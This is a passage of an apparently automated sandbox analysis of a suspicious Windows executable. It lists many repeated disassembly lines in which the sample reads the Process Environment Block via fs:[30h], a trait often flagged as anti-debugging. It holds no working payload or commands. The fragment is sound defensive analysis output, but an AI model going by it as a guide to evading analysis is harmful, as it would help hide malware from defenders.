Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]	4_2_011C656A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE59C mov eax, dword ptr fs:[00000030h]	4_2_011CE59C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]	4_2_012105A7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]	4_2_012105A7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012105A7 mov eax, dword ptr fs:[00000030h]	4_2_012105A7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C4588 mov eax, dword ptr fs:[00000030h]	4_2_011C4588
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01192582 mov eax, dword ptr fs:[00000030h]	4_2_01192582
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01192582 mov ecx, dword ptr fs:[00000030h]	4_2_01192582
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B45B1 mov eax, dword ptr fs:[00000030h]	4_2_011B45B1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B45B1 mov eax, dword ptr fs:[00000030h]	4_2_011B45B1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011965D0 mov eax, dword ptr fs:[00000030h]	4_2_011965D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA5D0 mov eax, dword ptr fs:[00000030h]	4_2_011CA5D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA5D0 mov eax, dword ptr fs:[00000030h]	4_2_011CA5D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE5CF mov eax, dword ptr fs:[00000030h]	4_2_011CE5CF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE5CF mov eax, dword ptr fs:[00000030h]	4_2_011CE5CF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC5ED mov eax, dword ptr fs:[00000030h]	4_2_011CC5ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC5ED mov eax, dword ptr fs:[00000030h]	4_2_011CC5ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011925E0 mov eax, dword ptr fs:[00000030h]	4_2_011925E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE5E7 mov eax, dword ptr fs:[00000030h]	4_2_011BE5E7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216420 mov eax, dword ptr fs:[00000030h]	4_2_01216420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]	4_2_011C8402
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]	4_2_011C8402
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C8402 mov eax, dword ptr fs:[00000030h]	4_2_011C8402
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]	4_2_0118E420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]	4_2_0118E420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E420 mov eax, dword ptr fs:[00000030h]	4_2_0118E420
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118C427 mov eax, dword ptr fs:[00000030h]	4_2_0118C427
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B245A mov eax, dword ptr fs:[00000030h]	4_2_011B245A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121C460 mov ecx, dword ptr fs:[00000030h]	4_2_0121C460
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118645D mov eax, dword ptr fs:[00000030h]	4_2_0118645D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE443 mov eax, dword ptr fs:[00000030h]	4_2_011CE443
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]	4_2_011BA470
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]	4_2_011BA470
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BA470 mov eax, dword ptr fs:[00000030h]	4_2_011BA470
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124A456 mov eax, dword ptr fs:[00000030h]	4_2_0124A456
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0121A4B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C44B0 mov ecx, dword ptr fs:[00000030h]	4_2_011C44B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011964AB mov eax, dword ptr fs:[00000030h]	4_2_011964AB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124A49A mov eax, dword ptr fs:[00000030h]	4_2_0124A49A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011904E5 mov ecx, dword ptr fs:[00000030h]	4_2_011904E5
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190710 mov eax, dword ptr fs:[00000030h]	4_2_01190710
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C0710 mov eax, dword ptr fs:[00000030h]	4_2_011C0710
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120C730 mov eax, dword ptr fs:[00000030h]	4_2_0120C730
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC700 mov eax, dword ptr fs:[00000030h]	4_2_011CC700
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C273C mov eax, dword ptr fs:[00000030h]	4_2_011C273C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C273C mov ecx, dword ptr fs:[00000030h]	4_2_011C273C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C273C mov eax, dword ptr fs:[00000030h]	4_2_011C273C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC720 mov eax, dword ptr fs:[00000030h]	4_2_011CC720
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC720 mov eax, dword ptr fs:[00000030h]	4_2_011CC720
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01190750 mov eax, dword ptr fs:[00000030h]	4_2_01190750
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2750 mov eax, dword ptr fs:[00000030h]	4_2_011D2750
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2750 mov eax, dword ptr fs:[00000030h]	4_2_011D2750
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C674D mov esi, dword ptr fs:[00000030h]	4_2_011C674D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C674D mov eax, dword ptr fs:[00000030h]	4_2_011C674D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C674D mov eax, dword ptr fs:[00000030h]	4_2_011C674D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198770 mov eax, dword ptr fs:[00000030h]	4_2_01198770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]	4_2_011A0770
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01214755 mov eax, dword ptr fs:[00000030h]	4_2_01214755
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121E75D mov eax, dword ptr fs:[00000030h]	4_2_0121E75D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012447A0 mov eax, dword ptr fs:[00000030h]	4_2_012447A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123678E mov eax, dword ptr fs:[00000030h]	4_2_0123678E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011907AF mov eax, dword ptr fs:[00000030h]	4_2_011907AF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0121E7E1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119C7C0 mov eax, dword ptr fs:[00000030h]	4_2_0119C7C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012107C3 mov eax, dword ptr fs:[00000030h]	4_2_012107C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011947FB mov eax, dword ptr fs:[00000030h]	4_2_011947FB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011947FB mov eax, dword ptr fs:[00000030h]	4_2_011947FB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]	4_2_011B27ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]	4_2_011B27ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]	4_2_011B27ED
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D2619 mov eax, dword ptr fs:[00000030h]	4_2_011D2619
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]	4_2_011A260B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E609 mov eax, dword ptr fs:[00000030h]	4_2_0120E609
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119262C mov eax, dword ptr fs:[00000030h]	4_2_0119262C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C6620 mov eax, dword ptr fs:[00000030h]	4_2_011C6620
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C8620 mov eax, dword ptr fs:[00000030h]	4_2_011C8620
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE627 mov eax, dword ptr fs:[00000030h]	4_2_011AE627
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125866E mov eax, dword ptr fs:[00000030h]	4_2_0125866E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125866E mov eax, dword ptr fs:[00000030h]	4_2_0125866E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AC640 mov eax, dword ptr fs:[00000030h]	4_2_011AC640
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C2674 mov eax, dword ptr fs:[00000030h]	4_2_011C2674
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA660 mov eax, dword ptr fs:[00000030h]	4_2_011CA660
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA660 mov eax, dword ptr fs:[00000030h]	4_2_011CA660
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194690 mov eax, dword ptr fs:[00000030h]	4_2_01194690
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194690 mov eax, dword ptr fs:[00000030h]	4_2_01194690
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C66B0 mov eax, dword ptr fs:[00000030h]	4_2_011C66B0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CC6A6 mov eax, dword ptr fs:[00000030h]	4_2_011CC6A6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012106F1 mov eax, dword ptr fs:[00000030h]	4_2_012106F1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012106F1 mov eax, dword ptr fs:[00000030h]	4_2_012106F1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0120E6F2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0120E6F2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0120E6F2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0120E6F2
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA6C7 mov ebx, dword ptr fs:[00000030h]	4_2_011CA6C7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA6C7 mov eax, dword ptr fs:[00000030h]	4_2_011CA6C7
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188918 mov eax, dword ptr fs:[00000030h]	4_2_01188918
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188918 mov eax, dword ptr fs:[00000030h]	4_2_01188918
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0122892B mov eax, dword ptr fs:[00000030h]	4_2_0122892B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121892A mov eax, dword ptr fs:[00000030h]	4_2_0121892A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E908 mov eax, dword ptr fs:[00000030h]	4_2_0120E908
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E908 mov eax, dword ptr fs:[00000030h]	4_2_0120E908
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121C912 mov eax, dword ptr fs:[00000030h]	4_2_0121C912
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01234978 mov eax, dword ptr fs:[00000030h]	4_2_01234978
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01234978 mov eax, dword ptr fs:[00000030h]	4_2_01234978
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121C97C mov eax, dword ptr fs:[00000030h]	4_2_0121C97C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264940 mov eax, dword ptr fs:[00000030h]	4_2_01264940
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01210946 mov eax, dword ptr fs:[00000030h]	4_2_01210946
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D096E mov eax, dword ptr fs:[00000030h]	4_2_011D096E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D096E mov edx, dword ptr fs:[00000030h]	4_2_011D096E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D096E mov eax, dword ptr fs:[00000030h]	4_2_011D096E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]	4_2_011B6962
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]	4_2_011B6962
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]	4_2_011B6962
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012189B3 mov esi, dword ptr fs:[00000030h]	4_2_012189B3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012189B3 mov eax, dword ptr fs:[00000030h]	4_2_012189B3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012189B3 mov eax, dword ptr fs:[00000030h]	4_2_012189B3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011909AD mov eax, dword ptr fs:[00000030h]	4_2_011909AD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011909AD mov eax, dword ptr fs:[00000030h]	4_2_011909AD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]	4_2_011A29A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0121E9E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0119A9D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C49D0 mov eax, dword ptr fs:[00000030h]	4_2_011C49D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012269C0 mov eax, dword ptr fs:[00000030h]	4_2_012269C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C29F9 mov eax, dword ptr fs:[00000030h]	4_2_011C29F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C29F9 mov eax, dword ptr fs:[00000030h]	4_2_011C29F9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0125A9D3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123483A mov eax, dword ptr fs:[00000030h]	4_2_0123483A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123483A mov eax, dword ptr fs:[00000030h]	4_2_0123483A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA830 mov eax, dword ptr fs:[00000030h]	4_2_011CA830
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]	4_2_011B2835
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]	4_2_011B2835
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]	4_2_011B2835
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov ecx, dword ptr fs:[00000030h]	4_2_011B2835
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]	4_2_011B2835
